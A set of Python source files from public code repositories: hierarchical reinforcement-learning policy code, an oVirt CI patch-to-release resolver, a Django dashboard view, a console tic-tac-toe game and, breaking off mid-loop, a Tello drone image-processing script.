self._contexts[env_num].append(context1)\n\n # Compute the current state goals to add to the final observation.\n for i in range(self.num_levels - 1):\n self._actions[env_num][i].append(self.goal_transition_fn(\n obs0=obs0[self.goal_indices],\n goal=self.meta_action[env_num][i],\n obs1=obs1[self.goal_indices]\n ).flatten())\n\n # Avoid storing samples when performing evaluations.\n if not evaluate:\n if not self.hindsight \\\n or random.random() < self.subgoal_testing_rate:\n # Store a sample in the replay buffer.\n self.replay_buffer.add(\n obs_t=self._observations[env_num],\n context_t=self._contexts[env_num],\n action_t=self._actions[env_num],\n reward_t=self._rewards[env_num],\n done_t=self._dones[env_num],\n )\n\n if self.hindsight:\n # Some temporary attributes.\n worker_obses = [\n self._get_obs(self._observations[env_num][i],\n self._actions[env_num][0][i], 0)\n for i in range(len(self._observations[env_num]))]\n intrinsic_rewards = self._rewards[env_num][-1]\n\n # Implement hindsight action and goal transitions.\n goal, rewards = self._hindsight_actions_goals(\n initial_observations=worker_obses,\n initial_rewards=intrinsic_rewards\n )\n new_actions = deepcopy(self._actions[env_num])\n new_actions[0] = goal\n new_rewards = deepcopy(self._rewards[env_num])\n new_rewards[-1] = rewards\n\n # Store the hindsight sample in the replay buffer.\n self.replay_buffer.add(\n obs_t=self._observations[env_num],\n context_t=self._contexts[env_num],\n action_t=new_actions,\n reward_t=new_rewards,\n 
done_t=self._dones[env_num],\n                    )\n\n        # Clear the memory that has been stored in the replay buffer.\n        self.clear_memory(env_num)\n\n    def _update_meta(self, level, env_num):\n        \"\"\"Determine whether a meta-policy should update its action.\n\n        This is done by checking the length of the observation lists that are\n        passed to the replay buffer, which are cleared whenever the highest\n        level meta-period has been met or the environment has been reset.\n\n        If the meta period is defined as a list, the period of level i (indexed\n        from highest to lowest) is equal to the product of the elements in the\n        list after index i.\n\n        Parameters\n        ----------\n        level : int\n            the level of the policy\n        env_num : int\n            the environment number. Used to handle situations when multiple\n            parallel environments are being used.\n\n        Returns\n        -------\n        bool\n            True if the action should be updated by the meta-policy at the\n            given level\n        \"\"\"\n        # In the case of passing the lowest level policy, return True (always\n        # perform an action).\n        if level == self.num_levels - 1:\n            return True\n\n        # the time since the most recent sample began collecting step samples\n        t_start = len(self._observations[env_num])\n\n        # meta-action period of the given level\n        if isinstance(self.meta_period, int):\n            level_period = self.meta_period ** (self.num_levels - level - 1)\n        else:\n            level_period = reduce((lambda x, y: x*y), self.meta_period[level:])\n\n        return t_start % level_period == 0\n\n    def clear_memory(self, env_num):\n        \"\"\"Clear internal memory that is used by the replay buffer.\"\"\"\n        self._actions[env_num] = [[] for _ in range(self.num_levels)]\n        self._rewards[env_num] = \\\n            [[0]] + [[] for _ in range(self.num_levels - 1)]\n        self._observations[env_num] = []\n        self._contexts[env_num] = []\n        self._dones[env_num] = []\n\n    def get_td_map(self):\n        \"\"\"See parent class.\"\"\"\n        # Not enough samples in the replay buffer.\n        if not self.replay_buffer.can_sample():\n            return {}\n\n        # Get a batch.\n        obs0, obs1, act, rew, done, _ = self.replay_buffer.sample(False)\n\n        td_map = {}\n        for i in range(self.num_levels):\n            td_map.update(self.policy[i].get_td_map_from_batch(\n                obs0=obs0[i],\n                actions=act[i],\n                rewards=rew[i],\n                obs1=obs1[i],\n                terminals1=done[i]\n            ))\n\n        return td_map\n\n    def _negative_reward_fn(self):\n        \"\"\"Return True if the intrinsic reward returns negative values.\n\n        Intrinsic reward functions with negative rewards incentivize early\n        terminations, which we attempt to mitigate in the training operation by\n        preventing early terminations from returning an expected return of 0.\n        \"\"\"\n        return \"exp\" not in self.intrinsic_reward_type \\\n            and \"non\" not in self.intrinsic_reward_type\n\n    def _pretrain_level(self, level):\n        \"\"\"Check whether the given level is still in its pre-training phase.\n\n        When using `pretrain_worker` the lowest level policy is trained every\n        step, and higher level policies are incrementally unfrozen for a\n        fraction of the training steps. 
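The list form of `meta_period` described above yields a per-level period equal to the product of the remaining entries; a quick standalone check with illustrative numbers makes this concrete:

```python
from functools import reduce

meta_period = [5, 3, 2]  # hypothetical periods for a 4-level hierarchy

# Level i acts every prod(meta_period[i:]) environment steps.
periods = [reduce(lambda x, y: x * y, meta_period[i:]) for i in range(3)]
assert periods == [30, 6, 2]  # level 0 every 30 steps, level 1 every 6, ...
```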
The highest level policy is not trained\n in this case, but the checkpoints can later be used to continue\n training the entire hierarchy.\n\n Parameters\n ----------\n level : int\n the level of the policy\n\n Returns\n -------\n bool\n True if the level should not be trained and should perform random\n actions, False otherwise\n \"\"\"\n # number of steps to perform pretraining for a given level, assuming\n # pretrain_worker is set to True.\n pretrain_steps = self.total_steps * \\\n (self.num_levels - level - 1) / (self.num_levels - 1)\n\n if level == 0:\n # bug fix for the final step\n return self.pretrain_worker\n else:\n return self.pretrain_worker and (self._steps < pretrain_steps)\n\n # ======================================================================= #\n # Auxiliary methods for HIRO #\n # ======================================================================= #\n\n def _sample_best_meta_action(self,\n meta_obs0,\n meta_obs1,\n meta_action,\n worker_obses,\n worker_actions,\n k=10):\n \"\"\"Return meta-actions that approximately maximize low-level log-probs.\n\n Parameters\n ----------\n meta_obs0 : array_like\n (batch_size, m_obs_dim) matrix of meta observations\n meta_obs1 : array_like\n (batch_size, m_obs_dim) matrix of next time step meta observations\n meta_action : array_like\n (batch_size, m_ac_dim) matrix of meta actions\n worker_obses : array_like\n (batch_size, w_obs_dim, meta_period+1) matrix of current Worker\n state observations\n worker_actions : array_like\n (batch_size, w_ac_dim, meta_period) matrix of current Worker\n environmental actions\n k : int, optional\n number of goals returned, excluding the initial goal and the mean\n value\n\n Returns\n -------\n array_like\n (batch_size, m_ac_dim) matrix of most likely meta actions\n \"\"\"\n batch_size, goal_dim = meta_action.shape\n\n # Collect several samples of potentially optimal goals.\n sampled_actions = self._sample(meta_obs0, meta_obs1, meta_action, k)\n assert sampled_actions.shape == (batch_size, goal_dim, k)\n\n # Compute the fitness of each candidate goal. 
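The linear unfreezing schedule above can be checked in isolation: with `total_steps` training steps and `num_levels` levels, level `i` stays frozen for the first `total_steps * (num_levels - i - 1) / (num_levels - 1)` steps. A small standalone sketch with made-up numbers:

```python
def pretrain_steps(total_steps, num_levels, level):
    # Steps during which `level` still performs random actions.
    return total_steps * (num_levels - level - 1) / (num_levels - 1)

total, levels = 900, 3
# Level 2 (the worker) trains from step 0; level 1 unfreezes at step 450;
# level 0 is never trained while pretrain_worker is enabled.
assert pretrain_steps(total, levels, 2) == 0
assert pretrain_steps(total, levels, 1) == 450
assert pretrain_steps(total, levels, 0) == 900
```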
The fitness is the sum of\n        # the log-probabilities of each action for the given goal.\n        fitness = self._log_probs(\n            sampled_actions, worker_obses, worker_actions)\n        assert fitness.shape == (batch_size, k)\n\n        # For each sample, choose the meta action that maximizes the fitness.\n        indx = np.argmax(fitness, 1)\n        best_goals = np.asarray(\n            [sampled_actions[i, :, indx[i]] for i in range(batch_size)])\n\n        return best_goals\n\n    def _sample(self, meta_obs0, meta_obs1, meta_action, num_samples, sc=0.5):\n        \"\"\"Sample different goals.\n\n        The goals are sampled as follows:\n\n        * The first num_samples-2 goals are acquired from a random Gaussian\n          distribution centered at s_{t+c} - s_t.\n        * The second to last goal is s_{t+c} - s_t.\n        * The last goal is the originally sampled goal g_t.\n\n        Parameters\n        ----------\n        meta_obs0 : array_like\n            (batch_size, m_obs_dim) matrix of meta observations\n        meta_obs1 : array_like\n            (batch_size, m_obs_dim) matrix of next time step meta observations\n        meta_action : array_like\n            (batch_size, m_ac_dim) matrix of meta actions\n        num_samples : int\n            number of samples\n        sc : float\n            scaling factor for the normal distribution.\n\n        Returns\n        -------\n        array_like\n            (batch_size, goal_dim, num_samples) matrix of sampled goals\n\n        Helps\n        -----\n        * _sample_best_meta_action(self)\n        \"\"\"\n        batch_size, goal_dim = meta_action.shape\n        goal_space = self.policy[0].ac_space\n        spec_range = goal_space.high - goal_space.low\n        random_samples = num_samples - 2\n\n        # Compute the mean and std for the Gaussian distribution to sample\n        # from, as well as the maxima and minima.\n        loc = meta_obs1[:, self.goal_indices] - meta_obs0[:, self.goal_indices]\n        scale = [sc * spec_range / 2]\n        minimum, maximum = [goal_space.low], [goal_space.high]\n\n        new_loc = np.zeros((batch_size, goal_dim, random_samples))\n        new_scale = np.zeros((batch_size, goal_dim, random_samples))\n        for i in range(random_samples):\n            new_loc[:, :, i] = loc\n            new_scale[:, :, i] = scale\n\n        new_minimum = np.zeros((batch_size, goal_dim, num_samples))\n        new_maximum = np.zeros((batch_size, goal_dim, num_samples))\n        for i in range(num_samples):\n            new_minimum[:, :, i] = minimum\n            new_maximum[:, :, i] = maximum\n\n        # Generate random samples for the above distribution.\n        normal_samples = np.random.normal(\n            size=(random_samples * batch_size * goal_dim))\n        normal_samples = normal_samples.reshape(\n            (batch_size, goal_dim, random_samples))\n\n        samples = np.zeros((batch_size, goal_dim, num_samples))\n        samples[:, :, :-2] = new_loc + normal_samples * new_scale\n        samples[:, :, -2] = loc\n        samples[:, :, -1] = meta_action\n\n        # Clip the values based on the meta action space range.\n        samples = np.minimum(np.maximum(samples, new_minimum), new_maximum)\n\n        return samples\n\n    def _log_probs(self, meta_actions, worker_obses, worker_actions):\n        \"\"\"Calculate the log probability of the next goal by the meta-policies.\n\n        Parameters\n        ----------\n        meta_actions : array_like\n            (batch_size, m_ac_dim, num_samples) matrix of candidate higher-\n            level policy actions\n        worker_obses : array_like\n            (batch_size, w_obs_dim, meta_period + 1) matrix of lower-level\n            policy observations\n        worker_actions : array_like\n            (batch_size, w_ac_dim, meta_period) list of lower-level policy\n            actions\n\n        Returns\n        -------\n        array_like\n            (batch_size, num_samples) fitness associated with every state /\n            action / goal pair\n\n        Helps\n        -----\n        * _sample_best_meta_action(self):\n        \"\"\"\n        raise NotImplementedError\n\n    # 
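`_log_probs` is left abstract above. One plausible realization for a deterministic (TD3-style) worker — a hedged sketch, not the repository's actual implementation — scores each candidate goal by the negative squared error between the worker policy's predicted actions and the actions actually taken; `policy_fn` below is a hypothetical stand-in for that policy:

```python
import numpy as np

def log_probs_sketch(candidate_goals, worker_obses, worker_actions, policy_fn):
    """Approximate action log-likelihoods for each candidate goal.

    candidate_goals: (batch, goal_dim, num_samples)
    worker_obses:    (batch, obs_dim, meta_period + 1)
    worker_actions:  (batch, ac_dim, meta_period)
    policy_fn:       maps (obs, goal) -> predicted action (hypothetical)
    """
    batch, _, num_samples = candidate_goals.shape
    meta_period = worker_actions.shape[2]
    fitness = np.zeros((batch, num_samples))
    for s in range(num_samples):
        goal = candidate_goals[:, :, s]
        for t in range(meta_period):
            pred = policy_fn(worker_obses[:, :, t], goal)
            err = worker_actions[:, :, t] - pred
            # Gaussian log-density up to a constant: -0.5 * ||error||^2
            fitness[:, s] += -0.5 * np.sum(err ** 2, axis=1)
    return fitness
```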
======================================================================= #\n    #                       Auxiliary methods for HAC                        #\n    # ======================================================================= #\n\n    def _hindsight_actions_goals(self, initial_observations, initial_rewards):\n        \"\"\"Calculate hindsight goal and action transitions.\n\n        These are then stored in the replay buffer along with the original\n        (non-hindsight) sample.\n\n        See the README at the front page of this repository for an in-depth\n        description of this procedure.\n\n        Parameters\n        ----------\n        initial_observations : array_like\n            the original worker observations with the non-hindsight goals\n            appended to them\n        initial_rewards : array_like\n            the original intrinsic rewards\n\n        Returns\n        -------\n        array_like\n            the goal at every step in hindsight\n        array_like\n            the modified intrinsic rewards taking into account the hindsight\n            goals\n\n        Helps\n        -----\n        * store_transition(self):\n        \"\"\"\n        new_goals = []\n        observations = deepcopy(initial_observations)\n        rewards = deepcopy(initial_rewards)\n        hindsight_goal = 0 if self.relative_goals \\\n            else observations[-1][self.goal_indices]\n        obs_tp1 = observations[-1]\n\n        for i in range(1, len(observations) + 1):\n            obs_t = observations[-i]\n\n            # Calculate the hindsight goal when using relative goals. If not,\n            # the hindsight goal is simply a subset of the final state\n            # observation.\n            if self.relative_goals:\n                hindsight_goal += \\\n                    obs_tp1[self.goal_indices] - obs_t[self.goal_indices]\n\n            # Modify the Worker intrinsic rewards based on the new hindsight\n            # goal.\n            if i > 1:\n                # FIXME: intrinsic_reward_scale\n                rewards[-(i - 1)] = self.intrinsic_reward_scale[0] \\\n                    * self.intrinsic_reward_fn(obs_t, hindsight_goal, obs_tp1)\n\n            obs_tp1 = deepcopy(obs_t)\n            new_goals = [deepcopy(hindsight_goal)] + new_goals\n\n        return new_goals, rewards\n\n    # ======================================================================= #\n    #                       Auxiliary methods for CHER                        #\n    # ======================================================================= #\n\n    def _setup_cooperative_gradients(self):\n        \"\"\"Create the cooperative gradients meta-policy optimizer.\"\"\"\n        raise NotImplementedError\n\n    def _cooperative_gradients_update(self,\n                                      obs0,\n                                      actions,\n                                      rewards,\n                                      obs1,\n                                      terminals1,\n                                      level_num,\n                                      update_actor=True):\n        \"\"\"Perform the gradient update procedure for the CHER algorithm.\n\n        This procedure is similar to update_from_batch, except that it runs\n        the self.cg_optimizer operation instead of the policy object's\n        optimizer, and utilizes some information from the worker samples as\n        well.\n\n        Parameters\n        ----------\n        obs0 : list of array_like\n            (batch_size, obs_dim) matrix of observations for every level in the\n            hierarchy\n        actions : list of array_like\n            (batch_size, ac_dim) matrix of actions for every level in the\n            hierarchy\n        obs1 : list of array_like\n            (batch_size, obs_dim) matrix of next step observations for every\n            level in the hierarchy\n        rewards : list of array_like\n            (batch_size,) vector of rewards for every level in the hierarchy\n        terminals1 : list of numpy bool\n            (batch_size,) vector of done masks for every level in the hierarchy\n        level_num : int\n            the hierarchy level number of the policy to optimize\n        update_actor : bool\n            specifies whether to update the actor policy of the meta policy.\n            The critic policy is still updated if this value is set to False.\n        \"\"\"\n        raise 
NotImplementedError\n","repo_name":"AboudyKreidieh/h-baselines","sub_path":"hbaselines/goal_conditioned/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":49008,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"53"}
{"seq_id":"34903604113","text":"#!/usr/bin/env python\n\"\"\"ovirt_build_resolver.py - Map between oVirt patches\nand their candidate release branches.\n\"\"\"\nfrom __future__ import absolute_import, print_function\nfrom collections import namedtuple\nimport os\nimport logging\nfrom xdg.BaseDirectory import xdg_cache_home\nfrom stdci_libs.git_utils import git\nfrom stdci_libs.stdci_dsl.api import get_threads_with_globals\nfrom stdci_libs.jenkins_objects import JobRunSpec\nfrom hashlib import sha1\nfrom six import itervalues, iteritems, string_types\nfrom functools import partial\n\nCACHE_NAME = 'gate_cache'\nlogger = logging.getLogger(__name__)\npatch_object = namedtuple(\n    'patch_object', ['name', 'refspec', 'branch', 'url', 'sha']\n)\n\n\ndef create_gate_info(sources_table, queue_prefix, st_project):\n    \"\"\"Given a sources table, generate data we need to run gate tests\n\n    :param str sources_table: A newline-and-space-separated table of patches\n                              to be parsed by `parse_sources_table`.\n    :param str queue_prefix: The prefix for change queue names that we support\n                             projects sending into. If given, only release\n                             queues that begin with the given prefix will be\n                             returned, and the prefix will be stripped from\n                             their names.\n    :param str st_project: The name of the project that contains the test\n                           suites that will be run by the gating logic.\n\n    :rtype: dict\n    :returns: A dict with a 'builds' key that includes required build\n              information as generated by `create_build_jobs` and an optional\n              `st_project_refspec` key that contains the last refspec of\n              the st_project that is found in the `sources_table` if it's\n              there.\n    \"\"\"\n    sources_list = parse_sources_table(sources_table, queue_prefix)\n    sources_list = list(sources_list)\n    gate_info = {'builds': list(create_build_jobs(sources_list))}\n    st_project_patch = find_last_patch(sources_list, st_project)\n    if st_project_patch is not None:\n        gate_info['st_project'] = {\n            k: getattr(st_project_patch, k)\n            for k in ('url', 'refspec', 'branch')\n        }\n    return gate_info\n\n\ndef create_build_jobs(sources_list):\n    \"\"\"Create build job threads from the given sources list.\n\n    :param list sources_list: List of source objects and releases as generated\n                              by `parse_sources_table`.\n\n    :rtype: iterator\n    :returns: iterator containing tuples where each contains a triplet of a\n              build job triggering specification, a list of releases or release\n              queues the build should be sent into, and a representative name\n              to describe the build as it is running.\n    \"\"\"\n    patch_to_release = unique_patches_per_release(sources_list)\n    jrs_list = (\n        (\n            create_job_spec(patch_object),\n            release,\n            create_pipeline_thread_name(patch_object)\n        )\n        for patch_object, release in patch_to_release\n    )\n    return jrs_list\n\n\ndef parse_sources_table(sources_table, queue_prefix=None):\n    \"\"\"Parse each patch and yield its data\n\n    :param str sources_table: A newline-and-space-separated table of patches\n                              where each row includes a url, a branch and\n                              a refspec.\n    :param str queue_prefix: (Optional) The prefix for change queue names\n                             that we support projects sending into. 
If given,\n                             only release queues that begin with the given\n                             prefix will be returned, and the prefix will be\n                             stripped from their names.\n\n    :rtype: iterator of tuples\n    :returns: returns for each patch in the sources_table a tuple of\n              patch_object and a list of release queues this patch targets.\n    \"\"\"\n    for patch in sources_table.splitlines():\n        patch_data = create_patch_object(patch)\n        releases = get_release_queues(patch_data, queue_prefix)\n        yield (patch_data, releases)\n\n\ndef find_last_patch(sources_list, project):\n    \"\"\"Find the last patch object for a given project\n\n    :param iterable sources_list: List of source objects and associated\n                                  releases generated by `parse_sources_table`.\n    :param str project: A name of a project to find a patch for\n\n    :rtype: patch_object\n    :returns: The patch object for the last patch for the project specified in\n              `project` that is found in `sources_list`, or None if not found\n    \"\"\"\n    proj_refs = [po for po, _ in sources_list if po.name == project]\n    if proj_refs:\n        return proj_refs[-1]\n    else:\n        return None\n\n\ndef create_patch_object(patch):\n    \"\"\"Per single patch, create its data.\n    :param str patch: a patch row from the sources table.\n    :rtype: patch_object.\n    :returns: instance of patch object.\n    \"\"\"\n    url, branch, refspec = patch.split()\n    name = get_project_name(url)\n    sha = get_patch_sha(url, refspec)\n    return patch_object(name, refspec, branch, url, sha)\n\n\ndef get_project_name(project_url):\n    \"\"\"Retrieves the project name from a given URL.\n    :param str project_url: URL of the project repository\n    :rtype: str\n    :returns: the project's name\n    \"\"\"\n    project_name = project_url.split('/')[-1]\n    if '.git' in project_name:\n        project_name = project_name.split('.git')[0]\n    return project_name\n\n\ndef clone_project(url, refspec):\n    \"\"\"Clone the project, fetch, and check out the refspec in order to later\n    read the stdci.yaml configuration.\n    :param str url: url of the remote git repo.\n    :param str refspec: the refspec (commit) to check out.\n    :rtype: str\n    :returns: path to the local cached checkout of the project.\n    \"\"\"\n    cache_dir_name = sha1(url.encode('utf-8')).hexdigest()\n    cache_dir_path = os.path.join(xdg_cache_home, CACHE_NAME, cache_dir_name)\n    cache_git_dir = os.path.join(cache_dir_path, '.git')\n    logger.debug(\"Cache git dir is: {0}\".format(cache_git_dir))\n    git('init', cache_dir_path)\n    rgit = partial(\n        git, '--git-dir=' + cache_git_dir,\n        '--work-tree=' + cache_dir_path\n    )\n    rgit('fetch', '-u', url, '+{0}:myhead'.format(refspec))\n    rgit('checkout', 'myhead')\n    rgit('reset', '--hard', 'HEAD')\n    rgit('clean', '-fdx')\n    return cache_dir_path\n\n\ndef get_patch_sha(url, refspec):\n    project_dir = clone_project(url, refspec)\n    project_git_dir = os.path.join(project_dir, '.git')\n    sha = git('--git-dir={0}'.format(project_git_dir), 'rev-parse', 'HEAD')\n    return sha\n\n\ndef get_release_queues(patch_object, queue_prefix=None):\n    \"\"\"Returns release branches per project's branch.\n\n    :param patch_object patch_object: object containing patch data.\n    :param str queue_prefix: (Optional) The prefix for change queue\n                             names that we support projects sending\n                             into. 
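The URL-to-name and prefix-stripping conventions used throughout this module are easy to exercise standalone; the URL and queue names below are purely hypothetical:

```python
def get_project_name(project_url):
    # Mirrors the helper above: last path segment, minus a .git suffix.
    name = project_url.split('/')[-1]
    return name.split('.git')[0] if '.git' in name else name

assert get_project_name('https://example.org/gerrit/ovirt-engine.git') \
    == 'ovirt-engine'

# Queue-prefix filtering as done in get_release_queues below:
queue_prefix = 'ovirt'
releases = ['ovirt-4.3', 'ovirt-master', 'other-1.0']
filtered = [r[len(queue_prefix) + 1:] for r in releases
            if r.startswith(queue_prefix + '-')]
assert filtered == ['4.3', 'master']
```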
If given, only release queues that\n                             begin with the given prefix will be\n                             returned, and the prefix will be\n                             stripped.\n\n    :rtype: list\n    :returns: a list of releases; empty if there are none.\n    \"\"\"\n    project_dir = clone_project(patch_object.url, patch_object.refspec)\n    _, gopts = get_threads_with_globals(project_dir, 'build-artifacts')\n    rb = gopts.get('releasebranches', {})\n    releases = rb.get(patch_object.branch, [])\n    if isinstance(releases, string_types):\n        releases = [releases]\n    if queue_prefix is not None:\n        releases = [\n            release[len(queue_prefix)+1:]\n            for release in releases\n            if release.startswith(queue_prefix + '-')\n        ]\n    return releases\n\n\ndef create_job_spec(project):\n    \"\"\"Create a job spec for a specific project\n    :param project: project specification.\n    :rtype: JobRunSpec\n    :returns: JobRunSpec instance for a given project.\n    \"\"\"\n    return JobRunSpec(\n        job_name=project.name + \"_standard-builder\",\n        params=dict(\n            STD_CI_REFSPEC=project.refspec,\n            STD_CI_CLONE_URL=project.url\n        )\n    ).as_pipeline_build_step()\n\n\ndef create_pipeline_thread_name(patch):\n    \"\"\"Generate a parallel thread name for the patch.\n    :param patch: patch object\n    :rtype: str\n    :returns: thread name for the parallel build\n    \"\"\"\n    job_name = \"-\".join([patch.name, patch.sha[0:7]])\n    return job_name\n\n\ndef unique_patches_per_release(patches):\n    \"\"\"\n    :param patches: list of patches\n    :rtype: iterator\n    :returns: iterator mapping each patch to the list of releases it targets.\n    \"\"\"\n    release_to_patches = dict()\n    for patch_object, releases in patches:\n        for release in releases:\n            release_to_patches.setdefault(\n                release, {})[patch_object.name] = patch_object\n    patches_to_releases = dict()\n    for release, patch_dict in iteritems(release_to_patches):\n        for patch_obj in itervalues(patch_dict):\n            patches_to_releases.setdefault(patch_obj, []).append(release)\n\n    return iteritems(patches_to_releases)\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/ost_build_resolver.py","file_name":"ost_build_resolver.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"}
{"seq_id":"23096346703","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom dashboard.mixins import PageTitleMixin\nfrom django.views import generic\n\nfrom measurement.models import Metric, Flag, Probe\nfrom event.models import Event\nfrom Case.models import Case\n\nclass HomeView(LoginRequiredMixin, PageTitleMixin, generic.TemplateView):\n    \"\"\"HomeView: TemplateView that\n    displays the home page\"\"\"\n    template_name = \"dashboard/home.html\"\n    page_header = \"VSF\"\n    page_header_description = \"Home Page\"\n    breadcrumb = [\"\"]\n\n    def get_context_data(self, **kwargs):\n        \"\"\" Insert in context all numbers and the last 10 rows of Cases,\n        Events, Flags and Measurements\"\"\"\n        context = super(HomeView, self).get_context_data(**kwargs)\n\n        \"\"\" Events variables to insert in context\"\"\"\n        events_num = Event.objects.count()\n        events_sketch_num = Event.objects.filter(draft=True).count()\n        events_publish_num = events_num - events_sketch_num\n        events = Event.objects.all().order_by('-id')[:10]\n\n        \"\"\" Cases variables to insert in context\"\"\"\n        cases_num = Case.objects.count()\n        cases_sketch_num = Case.objects.filter(draft=True).count()\n        cases_publish_num = cases_num - cases_sketch_num\n        cases = Case.objects.all().order_by('-id')[:10]\n\n        \"\"\" Flags variables to insert in context\"\"\"\n        flags = 
Flag.objects.all().order_by('-id')[:10]\n        flags_num = Flag.objects.count()\n        flags_hard_num = Flag.objects.filter(flag=True).count()\n        flags_muted_num = Flag.objects.filter(flag=None).count()\n        flags_soft_num = flags_num - flags_muted_num - flags_hard_num\n\n        \"\"\" Measurements variables to insert in context,\n        including the number of probes and reports\"\"\"\n        metrics_num = Metric.objects.count()\n        metrics = Metric.objects.all().order_by('-id')[:10]\n        context['probes_num'] = Probe.objects.count()\n        context['reports_num'] = Metric.objects.values(\n            'report_id').distinct().count()\n\n        context['metrics_num'] = metrics_num\n        context['metrics'] = metrics\n        context['flags'] = flags\n        context['flags_num'] = flags_num\n        context['flags_hard_num'] = flags_hard_num\n        context['flags_soft_num'] = flags_soft_num\n        context['flags_muted_num'] = flags_muted_num\n        context['events_num'] = events_num\n        context['events_sketch_num'] = events_sketch_num\n        context['events_publish_num'] = events_publish_num\n        context['events'] = events\n        context['cases_num'] = cases_num\n        context['cases_sketch_num'] = cases_sketch_num\n        context['cases_publish_num'] = cases_publish_num\n        context['cases'] = cases\n        return context\n","repo_name":"VEinteligente/vsf-incidents-server","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"13712018143","text":"#!/usr/bin/env python3\nimport random\n\nclass TTTBoard():\n    def __init__(self):\n        self.queued_player = 'X'\n        self.init_board()\n        self.plays = 0\n\n    def init_board(self):\n        self.board = []\n        count = 1\n        for _ in range(3):\n            row = []\n            for __ in range(3):\n                row.append(count)\n                count += 1\n            self.board.append(row)\n\n    def display_board(self):\n        b = self.board\n        game_display = \"\"\"\n    {} | {} | {}\n    ----------\n    {} | {} | {}\n    ----------\n    {} | {} | {}\n\"\"\".format(b[0][0], b[0][1], b[0][2], b[1][0], b[1][1], b[1][2], b[2][0], b[2][1], b[2][2])\n        print(game_display)\n\n    def switch_queued_player(self):\n        if self.queued_player == 'X':\n            self.queued_player = 'O'\n        else:\n            self.queued_player = 'X'\n\n    def play_position(self, position):\n        if not position.isdigit():\n            return False\n        position = int(position)\n        if not 1 <= position <= 9:\n            return False\n        index = 1\n        for row in range(3):\n            for col in range(3):\n                if index == position:\n                    if type(self.board[row][col]) != int:\n                        return False\n                    self.board[row][col] = self.queued_player\n                    self.plays += 1\n                    return True\n                index += 1\n        return False\n\n    def check_winner(self):\n        b = self.board\n        for i in range(3):\n            if len(set(b[i])) == 1 and type(b[i][0]) != int:\n                return b[i][0]\n            if (len(set([b[0][i], b[1][i], b[2][i]])) == 1\n                    and type(b[0][i]) != int):\n                return b[0][i]\n        if len(set([b[0][0], b[1][1], b[2][2]])) == 1 and type(b[1][1]) != int:\n            return b[1][1]\n        if len(set([b[0][2], b[1][1], b[2][0]])) == 1 and type(b[1][1]) != int:\n            return b[1][1]\n        return None\n\n    def computer_play(self):\n        count = sum([1 if type(c) == int else 0 for r in self.board for c in r])\n        move = random.randint(1, count)\n        for row in range(3):\n            for col in range(3):\n                if type(self.board[row][col]) == int:\n                    move -= 1\n                    if move == 0:\n                        self.board[row][col] = self.queued_player\n                        self.plays += 1\n                        return True\n        return False\n\n    def game_loop(self):\n        while True:\n            self.display_board()\n            print('pick the number of the position you would like to play')\n            position = None\n            while position is None:\n                position = input('an integer 
1 - 9 only ')\n                if self.play_position(position) is False:\n                    position = None\n                    print('invalid game choice, please play again')\n            if self.check_winner() is not None: break\n            if self.plays == 9: break\n            self.switch_queued_player()\n            while self.computer_play() is False: pass\n            if self.check_winner() is not None: break\n            self.switch_queued_player()\n        print('and the winner is...')\n        print(self.check_winner())\n\ndef main_app():\n    game = TTTBoard()\n    game.game_loop()\n\n\nif __name__ == \"__main__\":\n    main_app()\n","repo_name":"johncoleman83/codewars","sub_path":"tic_tac_toe/one_player.py","file_name":"one_player.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"25311120544","text":"import sys  # machine translation\nimport traceback\nimport tellopy\nimport av\nimport cv2.cv2 as cv2\nimport numpy as np\nimport time\nimport glob\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib.patches import Polygon\nimport datetime\nimport math\nfrom parse import parse\nimport threading \nimport socket\n\ndef main():\n    drone = tellopy.Tello() #tello controller\n\n    try:\n        drone.connect() #tello connection\n        drone.wait_for_connection(60.0)\n        \n        retry = 3\n        container = None\n        while container is None and 0 < retry:\n            retry -= 1\n            try:\n                # handle the start of video reception\n                container = av.open(drone.get_video_stream()) # container = decompress the Tello's compressed video stream data\n            except av.AVError as ave:\n                print(ave)\n                print('retry...')\n        \n        frame_skip = 300 # frames to skip before the video connection stabilizes\n        while True:\n            for frame in container.decode(video=0): # .decode bytes (video contents) -> string\n                if 0 < frame_skip: # frame-skip handling\n                    frame_skip = frame_skip - 1\n                    continue\n                \n                start_time = time.time() # time.time: elapsed time since the UNIX epoch (0:0:0)\n                \n                image_origin = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_RGB2BGR) #RGB convert\n                gray = cv2.cvtColor(np.array(frame.to_image()), cv2.COLOR_BGR2GRAY)\n\n                imagesplit1 = cv2.split(image_origin)\n\n                #Gg = imagesplit1[1] / gray\n                Gg = image_origin[:,:,1] / gray\n\n                shape = image_origin.shape\n                for x in range(0, shape[0]):\n                    for y in range(0, shape[1]):\n                        if Gg[x,y] < 0.89: \n                            Gg[x,y] = 1\n                        else:\n                            Gg[x,y] = 0\n                \n                G1 = np.uint8(Gg)\n\n                feature_params = {\"maxCorners\": 4, \"qualityLevel\": 0.5, \"minDistance\": 30, \"blockSize\": 5} # feature point detection\n                # max number of feature points  # threshold (higher -> fewer feature points)  # min distance between feature points (excludes points that are too close) \n                p0 = cv2.goodFeaturesToTrack(G1, mask=None, **feature_params) \n                #p0 = cv2.goodFeaturesToTrack(mask, 4, 0.5, 30) \n                p0 = np.int0(p0)\n                #print(p0)\n\n                if len(p0) >= 4:\n                    # plot the feature points for visualization\n                    for p in p0: # p0 x,y coordinates\n                        x,y = p.ravel() # unpack the elements of p0\n                        cv2.circle(image_origin, (x, y), 5, (0, 255, 255) , -1)\n                    \n                    x0 = p0[:,:,0].ravel() # x coordinates\n                    y0 = p0[:,:,1].ravel() # y coordinates\n                    l1 = np.sqrt((x0[0])**2+(y0[0])**2)\n                    l2 = np.sqrt((x0[1])**2+(y0[1])**2)\n                    l3 = np.sqrt((x0[2])**2+(y0[2])**2)\n                    l4 = np.sqrt((x0[3])**2+(y0[3])**2)\n                    \n                    